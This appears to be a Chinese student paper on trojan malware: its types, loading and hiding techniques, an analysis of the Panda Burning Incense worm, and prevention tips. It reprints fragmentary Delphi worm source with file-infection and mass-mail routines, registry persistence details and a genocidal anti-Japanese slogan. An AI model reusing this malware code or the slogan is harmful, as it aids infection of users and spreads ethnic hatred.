1、摘要随着信息化时代的到来人类社会生活对因特网的需求日益增长,使得计算机网络技术迅速发展和普及。因特网使得全世界都联系到了一起。极大的促进了全球一体化的发展。但是随着互联网的普及和应用的不断发展,各种黑客工具和网络手段导致网络和用户收到财产损失,其中最严重的就是木马攻击手段。它以其攻击范围广、危害大等特点成为常见的网络攻击技术之一,对整个互联网照成了极大的危害。本文分析了木马病毒的基本原理,针对木马病毒的特征、传播途径等分析结果,找出计算机感染病毒的原因。并且对木马病毒的种类、加载技术及现状进行了详细的研究,提出了完善的防范建议。目录一、 绪论 -11.木马病毒的概述 -11.1 木马的定义-1
2、1.2 木马病毒的基本特征 -11.3 木马病毒的传播途径 -11.3 木马病毒的病毒危害 -3二、 木马病毒的现状 -32.1 特洛伊木马的发展 -42.2 木马病毒的种类 -53、木马病毒的基本原理-73.1 木马病毒的加载技术-103.1.1 系统启动自动加载-103.1.2 文件劫持-113.2 木马病毒的隐藏技术-114、熊猫烧香病毒剖析-125、木马病毒的防范-175.1 基于用户的防范措施-185.2 基于服务器端的防范措施-205.3 加强计算机网络管理-22总结 -231一、绪论本文简单的介绍木马病毒的制作原理和防护措施,让大家对木马病毒的基本了解。所谓知己知彼方能百战百胜,
3、我们要是学会了木马病毒的制作原理和目的,这样对我们来说计算机病毒就不是那么深奥了,难以琢磨了。我们把计算机木马病毒的特性,生理周期,传播情况,主要危害,和他的分类弄清楚了,我们才能对症下药. 虽然计算机病毒正随着科技的进步而飞快的发展,但是我们只要把他的工作原理弄清楚了,再加以对计算机病毒的不断认识,我们就不必要为止恐慌了,下面就有请看主题:1 木马病毒的概述及概述 1.1 木马的的定义 木马的全称是“特洛伊木马”,是一种新型的计算机网络病毒程序,是一种基于远程控制的黑客工具,它利用自身具有的植入功能,或依附具有传播功能的病毒,进驻目标机器监听、修改。窃取文件。 1.2 木马的基本特征 1、隐
4、蔽性是其首要的特征 当用户执行正常程序时,在难以察觉的情况下,完成危害影虎的操作,具有1隐蔽性。它的隐蔽性主要体现在 6 个方面:1.不产生图标、2.文件隐藏、3.在专用文件夹中隐藏、4.自动在任务管理其中隐形、5.无声无息的启动、6.伪装成驱动程序及动态链接库 2、它具有自动运行性 它是一个当你系统启动时即自动运行的程序,所以它必需潜入在你的启动配置文件中,如 win.ini、 system.ini、winstart.bat 以及启动组等文件之中。3、木马程序具有欺骗性 木马程序要达到其长期隐蔽的目的,就必需借助系统中已有的文件,以防被你发现,它经常使用的是常见的文件名或扩展名,如“dllw
5、insysexplorer等字样,或者仿制一些不易被人区别的文件名,如字母“l”与数字“1” 、字母“o” 与数字 “0”,常修改基本文件中的这些难以分辨的字符,更有甚者干脆就借用系统文件中已有的文件名,只不过它保存在不同路径之中。还有的木马程序为了隐藏自己,也常把自己设置成一个 ZIP 文件式图标,当你一不小心打开它时,它就马上运行。等等这些手段那些编制木马程序的人还在不断地研究、发掘,总之是越来越隐蔽,越来越专业,所以有人称木马程序为“骗子程序”。 4、具备自动恢复功能 现在很多的木马程序中的功能模块已不再是由单一的文件组成,而是具有多重备份,可以相互恢复。 5、能自动打开端口应服务器客户
6、端的2通信手段,利用 TCP/IP 协议不常用端口自动进行连接,开方便之 “门”6、功能的特殊性 通常的木马的功能都是十分特殊的,除了普通的文件操作以外,还有些木马具有搜索 cache 中的口令、设置口令、扫描目标机器人的 IP地址、进行键盘记录、远程注册表的操作、以及锁定鼠标等功能,上面所讲的远程控制软件的功能当然不会有的,毕竟远程控制软件是用来控制远程机器,方便自己操作而已,而不是用来黑对方的机器的。 1.3 木马的传播途径 1.利用操作系统和浏览器漏洞传播。 2.利用移动存储设备(U 盘)等来传播。 3.利用第三方软件(如 realplayer,迅雷,暴风影音等)漏洞传播 4.利用ARP
7、 欺骗方式来传播 5 利用电子邮件,QQ,MSN 等通讯软件传播 6.利用网页挂马,嵌入恶意代码来传播 1.4 木马病毒的危害 1利用通讯软件盗取用户个人信息。 黑客可以利用木马病毒盗取用户的如 QQ,MSN 等账号进行盗取用户好友个人信息等。 2盗取网游账号,威胁我们的虚拟财产安全 黑客利用木马病毒盗取用户游戏账户密码,并将用户游戏中的装备或游戏币转移,照成损失。 3盗取用户的网银信息,威胁我们的真是财产安全黑客利用木马,采用键盘记录等方法盗取用户的个人银行信息,直接到市用户的经济损失 34给电脑打开后门,使电脑可能被黑客控制 2 木马病毒的现状 目前,木马病毒结合了传统病毒的破坏性,产生了
8、更有危害性的混合型木马病毒。有关报告显示:截止 2011 年上半年,所截获的新增病毒总计有 111474 种,而木马病毒占总数的 64.1%。其中,盗号木马占总木马数的 70%,从数据上可以看出,木马数量的成倍增长,变种称出不穷,使得计算机用户的处境更加危险。 2.1 特洛伊木马的发展 计算机世界的特洛伊木马(Trojan)是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击 Dos 等特殊功能的后门程序。 第一代木马 :伪装型病毒 这种病毒通过伪装成一个合法性程序诱骗用户上当。世界上第一个计算机木马是出现在 1986 年的 PC-Write 木马。
9、它伪装成共享软件 PC-Write 的2.72 版本(事实上,编写 PC-Write 的 Quicksoft 公司从未发行过 2.72 版本),一旦用户信以为真运行该木马程序,那么他的下场就是硬盘被格式化。在我刚刚上大学的时候,曾听说我校一个前辈牛人在 WAX 机房上用 BASIC 作了一个登录界面木马程序,当你把你的用户 ID,密码输入一个和正常的登录界面一模一样的伪登录界面后后,木马程序一面保存你的 ID,和密码,一面提示你密码错误让你重新输入,当你第二次登录时,你已成了木马的牺牲品。此时的第一代木马还不4具备传染特征。 第二代木马 : AIDS 型木马 继 PC-Write 之后,198
10、9 年出现了 AIDS 木马。由于当时很少有人使用电子邮件,所以 AIDS 的作者就利用现实生活中的邮件进行散播:给其他人寄去一封封含有木马程序软盘的邮件。之所以叫这个名称是因为软盘中包含有 AIDS和 HIV 疾病的药品,价格,预防措施等相关信息。软盘中的木马程序在运行后,虽然不会破坏数据,但是他将硬盘加密锁死,然后提示受感染用户花钱消灾。可以说第二代木马已具备了传播特征(尽管通过传统的邮递方式)。 第三代木马:网络传播性木马 随着 Internet 的普及,这一代木马兼备伪装和传播两种特征并结合 TCP/IP网络技术四处泛滥。同时还有了两个新特征,第一,添加了“后门”功能;第二,添加了击键
11、记录功能;第三,有了视频监控和桌面监控等功能。 2.2 木马病毒的种类 种类 途径 传播途径破坏性 唯一的功能就是破坏并且删除文件,可以自动的删除电脑上的硬盘传播DLL、INI、EXE 文件密码发送型 向密码输入窗口发送 WM_SETTEXT消息模拟输入密码,向按钮窗口发送WM_COMMAND 消息模拟单击。在破解过程中,把密码保存在一个文件中,以便在下一个序列的密码再次进行穷举或多部机器同时进行分工穷举直到找到密码为止。可以找到隐藏密码并把它们发送到指定的信箱。也有些黑客软件长期潜伏,记录操作者的键盘操作,从中寻找有用的密码。远程访问型 最广泛的是特洛伊马,只需有人运行了服务端程序,如果客户
12、知道了服务端的 IP 地址,就可以实现远程控制通过控制 internet 的 UDP 协议进行传播。键盘记录木马这种特洛伊木马是非常简单的。它们只做一件事情,就是记录受害者的键盘敲击并且在 LOG 文件里查找密码潜伏在计算机硬盘中,通过记录使用者的键盘操作进行传播。Dos 攻击木马随着 DoS 攻击越来越广泛的应用,被用作 DoS 攻击的木马也越来越流起来。当你入侵了一台机器,给他种上 DoS 攻击木马,你控制的肉鸡数量越多,你发动 DoS 攻击取得成功的机率就越大。通过邮件传播,一旦机器被感染,木马就会随机生成各种各样主题的信件,对特定的邮箱不停地发送邮件,一直到对方瘫痪、不能接受邮件为止。
13、代理木马 “代理木马”具有自动下载木马病毒的功能,一旦感染系统后,当系统接它们可以根据病毒编者指定的网址下载木马病毒或其他恶意软件,入互联网,再从指定的网址下载其他木马、病毒等恶意软件。 还可以通过网络和移动存储介质传播。FTP 木马 这种木马可能是最简单和古老的木马了,它的唯一功能就是打开 21 端口,等待用户连接。控制用户的 21 端口使其运行某一指定的命令。反弹端口型木马木马定时监测控制端的存在,发现控制端上线立即弹出端口主动连结控制端打开的主动端口;即使用户使用扫描软件检查自己的端口,发现类似TCP 的情况。通过控制计算机防火墙端口进行传播。3 木马病毒的基本原理 木马病毒通常饱饭两个
14、部分:服务器和客户端。服务端植入危害主机,而施种者利用客户端侵入运行了服务端的主机。木马的服务端一旦启动,受害主机的一个或几个端口即对施种者敞开,使得 施种者可以利用这些端口受害主机,开始执行入侵操作。如图:图表 1 木马病毒传播基本原理71、配置、传播木马 一般来说一个设计成熟的木马都有木马配置程序,从具体的配置内容看,主要是为了实现伪装和信息反馈两方面的功能。 传播方式: 木马的传播方式主要有两种: 一种是通过 E-MAIL,控制端将木马程序以附件的形式夹在邮件中发送出 去, 收信人只要打开附件系统就会感染木马;另一种是软件下载,一些非正规的网站以提供软件下载为 名义, 将木马捆绑在软件安
15、装程序上,下载后,只要一运行这些程序,木马就会自动安装。 2、运行木马 服务端用户运行木马或捆绑木马的程序后,木马就会自动进行安装。首先将自身拷贝到 WINDOWS 的 系统文件夹中 (C:WINDOWS 或C:WINDOWSSYSTEM 目录下),然后在注册表,启动组,非启动组中设置好木马的触发条件,这样木马的安装就完成了。 木马被激活后,进入内存,并开启事先定义的木马端口,准备与控制端建立连接。这时服务端用 户可以在 MS-DOS 方式下,键入 NETSTAT -AN 查看端口状态,一般个人电脑在脱机状态下是不会有端口 开放的,如果有端口开放,你就要注意是否感染木马了。 3、信息反馈 木马
16、配置程序将就信息反馈的方式或地址进行设置,如设置信息反馈的邮件地址,IRC 号 ,ICO 号等等。 4、建立连接 一个木马连接的建立首先必须满足两个条件:一是服务端已安装了木马程序;二是控制端,服务端都要在线。在此基础上控制端可以通过木马端口与服务端建立连接值得一提的要扫描整个 IP 地址段显然费时费力,一般来说控制端都是先通8过信息反馈获得服务端的 IP 地址,由于拨号上网的 IP 是动态的,即用户每次上网的 IP 都是不同的。 5、远程控制 木马连接建立后,控制端端口和木马端口之间将会出现一条通道,控制端上的控制端程序可藉这条通道与服务端上的木马程序取得联系,并通过木马程序对服务端进行远程
17、控制。 6、木马病毒的传播及植入 由于木马病毒是一种非自我复制的恶意代码,因此她需要依靠用户向其他人发送其拷贝。木马病毒可以作为电子邮件附件或者隐藏在用户与其他用户进行交互的文档或者其他文件中。他们还可以被其他恶意代码所携带,如蠕虫。木马病毒有时也会隐藏在从互联网上下载的捆绑软件中。当用户安装此软件是,病毒就会在后台秘密安装。木马植入技术主要是指木马病毒利用各自途径进入到目标机器的具体方法。 7、木马病毒植入技术 木马病毒植入技术,主要是指木马病毒利用各种途径进入目标机器的具体实现方法。 (1)利用电子邮件进行传播: 攻击者将木马程序伪装成 E-mail 附件的形式发送过去,收信方只要查看邮件
18、附件就会使木马程序得到运行并安装进入系统。 (2)利用网络下载进行传播: 一些非正规的网站以提供软件下载为名 ,将木马捆绑在软件安装程序上,下载后, 只要运行这些程序, 木马就会自动安装。 (3)利用网页浏览传播:这种方法利用 Java Applet 编写出一个 HTML 网页, 当我们浏览该页面时,JavaApplet 会在后台将木马程序下载到计算机缓存中,然后修改注册表,使指向木马程序。 (4)利用一些漏洞进行传播: 如微软著名的 IIS 服务器溢出漏洞,通过一个 IISHACK9攻击程序即可把 IIS 服务器崩溃 ,并且同时在受控服务器执行木马程序。由于微软的浏览器在执行 Script
19、脚本上存在一些漏洞, 攻击者可以利用这些漏洞传播病毒和木马,甚至直接对浏览者主机进行文件操作等控制。 (5)远程入侵进行传播:黑客通过破解密码和建立 IPC 远程连接后登陆到目标主机, 将木马服务端程序拷贝到计算机中的文件夹(一般在 C:WINDOWSsystem32 或者 C:WINNTsys-tem32)中,然后通过远程操作让木马程序在某一个时间运行。(6)基于 DLL 和远程线程插入的木马植入:这种传播技术是以 DLL 的形式实现木马程序,然后在目标主机中选择特定目标进程(如系统文件或某个正常运行程序),由该进程将木马 DLL 植入到本系统中。(7)利用蠕虫病毒传播木马: 网络蠕虫病毒具
20、有很强的传染性和自我复制能力,将木马和蠕虫病毒结合在一起就可以大大地提高木马的传播能力。结合了蠕虫病毒的木马利用病毒的特性,在网络上进行传播、复制,这就加快了木马的传播速度。 3.1 木马病毒的加载技术 当木马病毒成功植入目标机后,就必须确保自己可以通过某种方式得到自动运行。常见的木马病毒加载技术主要包括:系统启动自动加载、文件关联和文件劫持等。3.1.1 系统启动自动加载 系统启动自动加载,这是最常的木马自动加载方法。木马病毒通过将自己拷贝到启动组,或在 win.ini,system.ini 和注册表中添加相应的启动信息而实现系统启动时自动加载。这种加载方式简单有效,但隐蔽性差。目前很多反木
21、马软件都会扫10描注册表的启动键(信息),故而新一代木马病毒都采用了更加隐蔽的加载方式。 3.1.2 文件劫持 文件劫持,是一种特殊的木马加载方式。木马病毒被植入到目标机后,需要首先对某个系统文件进行替换或嵌入操作,使得该系统文件在获得访问权之前,木马病毒被率先执行,然后再将控制权交还给相应的系统文件。采用这种方式加载木马不需要修改注册表,从而可以有效地躲过注册表扫描型反木马软件的查杀。这种方式最简单的实现方法是将某系统文件改名,然后将木马程序改名。这样当这个系统文件被调用的时候,实际上是木马程序被运行,而木马启动后, 再调用相应的系统文件并传递原参数。 3.2 木马病毒的隐藏技术 为确保有效
22、性,木马病毒必须具有较好的隐蔽性。木马病毒的主要隐蔽技术包括:伪装、进程隐藏、DLL 技术等。 伪装,从某种意义上讲,伪装是一种很好的隐藏。木马病毒的伪装主要有文件伪装和进程伪装。前者除了将文件属性改为隐藏之外,大多通过采用一些比较类似于系统文件的文件名来隐蔽自己;而后者则是利用用户对系统了解的不足,将自己的进程名设为与系统进程类似而达到隐藏自己的目的。 进程隐藏,木马病毒进程是它驻留在系统中的最好证据,若能够有效隐藏自己的进程,显然将大大提高木马病毒的隐蔽性。在 windows98 系统中可以通过将自己设为系统进程来达到隐藏进程的目的。但这种方法在 windows2000/NT 下就不再有效
23、,只能通过下面介绍的 DLL 技术或设备驱动技术来实现木马病毒的隐藏。DLL 技术,采用 DLL 技术实现木马的隐蔽性 ,主要通过以下两种途径 :DLL 陷阱和11DLL 注入。DLL 陷阱技术是一种针对 DLL(动态链接库)的高级编程技术,通过用一个精心设计的 DLL 替换已知的系统 DLL 或嵌入其内部,并对所有的函数调用进行过滤转发。DLL 注入技术是将一个 DLL 注入到某个进程的地址空间,然后潜伏在其中并完成木马的操作。 4 “熊猫烧香”病毒剖析 “熊猫烧香”病毒感染机理 :“熊猫烧香”,是一个感染型的蠕虫病毒,它能感染系统中 exe,com,pif,src,html ,asp 等文
24、件,它还能中止大量的反病毒软件进程并且会删除扩展名为 gho 的文件,该文件是一系统备份工具GHOST 的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe 可执行文件全部被改成熊猫举着三根香的模样。 1:拷贝文件病毒运行后, 会把自己拷贝到C:WINDOWSSystem32Driversspoclsv.exe 2:添加注册表自启动病毒会添加自启动项HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun svcshare - C:WINDOWSSystem32Driversspoclsv.exe 3:病毒行为 a:每
25、隔 1 秒寻找桌面窗口, 并关闭窗口标题中含有以下字符的程序:QQKav、 QQAV、防火墙、进程、 VirusScan、网镖、杀毒、毒霸、瑞星、江民、黄山 IE、超级兔子、优化大师、木马克星、木马清道夫、QQ 病毒、注册表编辑器、系统配置实用程序、卡巴斯基反病毒、Symantec AntiVirus、Duba、esteem proces、绿鹰 PC、密码防盗、噬菌体、木马辅助查找器、System Safety Monitor、Wrapped gift Killer、Winsock Expert、游戏木马检测大师、12msctls_statusbar32、pjf(ustc)、IceSword,
26、并使用的键盘映射的方法关闭安全软件 IceSword。添加注册表使自己自启动HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun svcshare - C:WINDOWSSystem32Driversspoclsv.exe 并中止系统中以下的进程:Mcshield.exe、VsTskMgr.exe 、naPrdMgr.exe、UpdaterUI.exe 、TBMon.exe、 scan32.exe、Ravmond.exe、CCenter.exe 、RavTask.exe 、Rav.exe、Ravmon.exe、RavmonD.ex
27、e 、RavStub.exe、KVXP.kxp、kvMonXP.kxp 、KVCenter.kxp、KVSrvXP.exe、KRegEx.exe、UIHost.exe、TrojDie.kxp、FrogAgent.exe、Logo1_.exe、Logo_1.exe、Rundl132.exe。 b:每隔 18 秒点击病毒作者指定的网页, 并用命令行检查系统中是否存在共享,共存在的话就运行 net share 命令关闭 admin$共享。 c:每隔 10 秒下载病毒作者指定的文件, 并用命令行检查系统中是否存在共享,共存在的话就运行 net share 命令关闭 admin$共享。 d:每隔 6 秒
28、删除安全软件在注册表中的键值。 并修改以下值不显示隐藏文件 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL CheckedValue - 0x00 删除以下服务:navapsvc、wscsvc、KPfwSvc、SNDSrvc 、ccProxy、ccEvtMgr、ccSetMgr、SPBBCSvc、Symantec Core LC、NPFMntor MskService、FireSvc。 e:感染文件 病毒会感染扩展名为 exe,pif,com,src 的文件,
29、把自己附加到文件的头部,并在13扩展名为 htm,html, asp,php,jsp,aspx 的文件中添加一网址,用户一但打开了该文件,IE 就会不断的在后台点击写入的网址,达到增加点击量的目的,但病毒不会感染以下文件夹名中的文件: WINDOW、 Winnt、System Volume Information、Recycled、Windows NT、WindowsUpdate 、Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、Common Files、ComPlus Applications、Messeng
30、er、InstallShield Installation Information、MSN、Microsoft Frontpage、Movie Maker、MSN Gamin Zone 。 g:删除文件 病毒会删除扩展名为 gho 的文件,该文件是一系统备份工具 GHOST 的备份文件使用户的系统备份文件丢失。 “熊猫烧香”病毒核心源码 用 Delphi 写program Japussy; uses Windows, SysUtils, Classes, Graphics, ShellAPI, Registry; const HeaderSize = 82432; /病毒体的大小 IconOf
31、fset = $12EB8; /PE 文件主图标的偏移量 /在我的 Delphi5 SP1 上面编译得到的大小,其它版本的 Delphi 可能不同 /查找 2800000020 的十六进制字符串可以找到主图标的偏移量 HeaderSize = 38912; /Upx 压缩过病毒体的大14小 IconOffset = $92BC; /Upx 压缩过 PE 文件主图标的偏移量 /Upx 1.24W 用法: upx -9 -8086 Japussy.exe IconSize = $2E8; /PE 文件主图标的大小-744 字节IconTail = IconOffset + IconSize; /P
32、E 文件主图标的尾部ID = $44444444; /感染标记 /垃圾码,以备写入 Catchword = If a race need to be killed out, it must be Yamato.If a country need to be destroyed, it must be Japan! + * W32.Japussy.Worm.A *; $R *.RES Function RegisterServiceProcess()function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; st
33、dcall; external Kernel32.dll; /函数声明 var TmpFile: string; Si: STARTUPINFO; Pi: PROCESS_INFORMATION; IsJap: Boolean = False; /日文操作系统标记 判断是否为 Win9x Function IsWin9x()function IsWin9x: Boolean; var Ver: TOSVersionInfo; begin Result := False; Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); if not GetV
34、ersionEx(Ver) then Exit; 15if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then /Win9x Result := True; end; 在流之间复制 procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer);var LoopFiles(Path + SubDir.Stringsi + , Mask); FreeAndNil(SubDir); end; 遍历磁盘
35、上所有的文件 procedure InfectFiles; var DriverList: string; i, Len: Integer; begin if GetACP = 932 then /日文操作系统 IsJap := True; /去死吧! DriverList := GetDrives; /得到可写的磁盘列表Len := Length(DriverList); while True do /死循环begin for i := Len downto 1 do /遍历每个磁盘驱动器LoopFiles(DriverListi + :, *.*); /感染之SendMail; /发带毒邮
36、件 Sleep(1000 * 60 * 5); /睡眠 5 分钟 end; end; 主程序开始 begin if IsWin9x then /是16Win9xRegisterServiceProcess(GetCurrentProcessID, 1) /注册为服务进程 else /WinNT begin /远程线程映射到 Explorer 进程 /哪位兄台愿意完成之?end; /如果是原始病毒体自己 if CompareText(ExtractFileName(ParamStr(0), Japussy.exe) = 0 then InfectFiles /感染和发邮件 else /已寄生于宿
37、主程序上了,开始工作 begin TmpFile := ParamStr(0); /创建临时文件Delete(TmpFile, Length(TmpFile) - 4, 4); TmpFile := TmpFile + #32 + .exe; /真正的宿主文件,多一个空格 ExtractFile(TmpFile); /分离之 FillStartupInfo(Si, SW_SHOWDEFAULT); CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True, 0, nil, ., Si, Pi); /创建新进程运行之 InfectF
38、iles; /感染和发邮件 end; End. 5 木马病毒的防范计算机病毒的防范措施针对病毒的发展趋势, 从上面的讨论知道木马程序是非常危险的,计算机一旦感染病毒是非常危险的,所以在前人研究的基础上我认17为以下几种方法也有助于病毒的防范。如: (1)不随意打开来历不明的邮件,阻塞可疑邮件。 (2 )不随意下载来历不明的软件。 (3)及时修补漏洞和关闭可疑的端口。 (4 )尽量少用共享文件夹。 (5)运行实时监控系统。 (6)经常升级系统和更新杀毒软件。 (7)限制不必要的具有传输能力的文件。( 8)关闭不常使用端口。 我国计算机网络安全形势十分严峻, 采用有效的病毒防范措施显得尤其重要。计
39、算机网络中最主要的软硬件实体就是服务器和工作站, 防治病毒首先要考虑这两部分: 5.1 基于用户的防范措施 (1)在网络接口卡上安装防病毒芯片。 是一种硬件防病毒技术,与操作系统相配合,可以防范大部分针对缓冲区溢出漏洞的攻击。Intel 的防病毒技术是 EDB,AMD 的防病毒技术是 EV,但不管叫什么,它们的原理都是大同小异的。严格来说,目前各个 CPU 厂商在 CPU内部集成的防病毒技术不能称之为“硬件防毒”。这样可以更加实时有效地保护工作站及通向服务器的桥梁。 (2)创建紧急引导盘和最新紧急修复盘。 紧急引导盘就是常说的启动盘,当电脑无法进入操作系统时,可以用它引导系统,进入 dos 状
40、态,然后对系统进行各种修复。计算机病毒的防治措施中创建的紧急修复盘是对当前计算机的分区表,引导区信息等重要信息进行的备份,当计算机的这些信息被病毒破坏后,可以通过这张盘进行恢复,尽量减少损失。( 3)尽量不用外来的软件和闪盘, 用前要用最新正版的杀毒软件查杀。 18正版杀毒软件非常稳定,不会出现各种未知问题,如病毒库不能及时更新等;遇到疑问时可获取杀毒软件官方客服支持,以便及时解决问题;能及时的更新病毒库和正版杀毒软件版本,更为有效的防范网络威胁;可避免因在不可靠的网站寻找破解等信息时候中毒或错将恶意软件当作破解补丁下载。可享受更多更好的安全服务,这些服务是破解或盗版杀毒软件所不可能有的。能够
41、享受官方为正版用户提供的增强服务,比如诺顿、迈克菲的数据在线存储等 (4)重要文件和数据不要安装在系统盘上, 注意及时做好数据的备份。 数据库的数据全在电脑上,如果出现一些意外(系统崩溃,认为破坏,硬盘损坏等),会造成数据丢失,而要数据恢复的话,需要花很多时间和金钱。( 5)对计算机系统软件及时安装补丁程序, 检查注册表和内存中可疑进程。 系统必须打补丁,这是一个安全常识,现在的病毒最爱做的事情就是利用系统漏洞攻击你的电脑,所以一位说可以不打补丁的朋友的说法是严重错误的,不过补丁也可以用 360 来打,应该说 360 下载的补丁最多只是存在判断不正确的问题,就是说出现实际无需安装的补丁的下载提
42、示,一般安装补丁是以Windows Update 上的提示为准,而况你是正版的,更加无需担心正版验证的问题。绝大多数时候就算安装了多余的补丁,也不会引起系统崩溃,你这崩溃和补丁可能存在关系,但也可能实际上是无关的,你在重启之后 WIN7 自动进行了修复,也就自然恢复正常了。 (6)接收电子邮件、从网络下载各种免费和共享软件要进行必要的检查和杀毒后才能打开、安装和使用。 (7)提高自身素质,上网浏览时不要访问不良网站。 当前,网络病毒的最新趋19势是: (1)不法分子或好事之徒制作的匿名网页直接提供了下载大批病毒活样本的便利途径。 (2)由于学术研究的病毒样本提供机构同样可以成为别有用心的人的使用工具。( 3)由于网络匿名登录才成为可能的专门关于病毒制作研究讨论的学术性质的电子论文、期刊、杂志及相关的网上学术交流活动,如病毒制造协会年会等等,都有可能成为国内外任何想成为新的病毒制造者学习、借鉴、盗用、抄袭的目标与对象。 (4)散见于网站上大批病毒制作工具、向导、程序等等,使得无编程经验和基础的人制造新病毒成为可能。(5)新技术、新病毒使得几乎所有人在不知情时无意中成为病毒扩散的载体或传播者。其传播方式和速度之快,让人防不胜防,由此可见反病毒过程任重道远。 (6)发现病毒后要立刻关机, 因为正常关机操作,Wind
